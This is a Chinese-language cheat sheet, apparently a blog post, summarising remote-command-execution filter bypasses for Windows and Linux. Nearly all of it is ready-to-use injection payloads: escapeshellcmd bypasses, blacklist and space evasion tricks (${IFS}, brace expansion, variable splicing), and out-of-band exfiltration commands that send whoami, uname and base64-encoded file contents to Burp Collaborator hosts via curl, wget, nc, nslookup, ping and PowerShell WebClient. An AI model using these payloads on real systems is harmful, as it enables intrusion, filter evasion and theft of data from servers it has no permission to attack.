分类 总结 下的文章

RCE bypass总结

Windows

绕过escapeshellcmd()

  • %1a (php version <= 5.2.5) 多字节字符

    dir ../ %1a| whoami
  • %0a 换行

    dir ../ %1a | whoami

数据外带(OOB)

  • HTTP

for /F %x in ('whoami') do start http://402h4pmr24p090cenlc9bmeao1uvik.burpcollaborator.net/%x
  • DNS

for /F %x in ('whoami') do nslookup %x.qkeimef2pqn9xr5stc1k9aqd046vuk.burpcollaborator.net  
for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.424h6por44r0b0eeple9dmgaq1wwukj.burpcollaborator.net
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1
%i.424h6por44r0b0eeple9dmgaq1wwukj.burpcollaborator.net

有空格等特殊符号的话,数据可能被截断,有ps的话可以用ps来base64编码

for /F %x in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%x'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://424h6por44r0b0eeple9dmgaq1wwukj.burpcollaborator.net/'+$a);

Linux

绕过黑名单

  • 字符拼接

a=l;b=s;$a$b  --> ls
a=c;b=at;c=t;d=xt;$a$b $c$d  -->  cat txt
a=c;b=at;c=t;d=xt;$a$b ${c}${d} -->  cat txt
  • 从其它文件截取

echo `expr substr $(awk NR==1 1.php) 1 1`
  • 从环境变量截取

echo ${SHELLOPTS:1:1}
  • 执行上一条命令

!!

绕过空格

cat<>txt
{ls,-la}
{ls,-l,-a}
cat${IFS}txt

IFS是个全局变量,默认值是空白。

a=$'\x20txt';cat$a

利用Tab键

http://127.0.0.1/info.php?c=ls%09-la

数据外带

curl l5rzvd9oe86ejd54tlyc85mmndt3hs.burpcollaborator.net/?`uname`

ping -c 1 `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

wget `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

nc `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

telnet `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

ssh `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

......

base64编码:

curl http://alznpv7xnaa6u6xk8rxfwszg97f03p.burpcollaborator.net/?`cat txt|base64`

curl http://alznpv7xnaa6u6xk8rxfwszg97f03p.burpcollaborator.net/?$(cat txt|base64)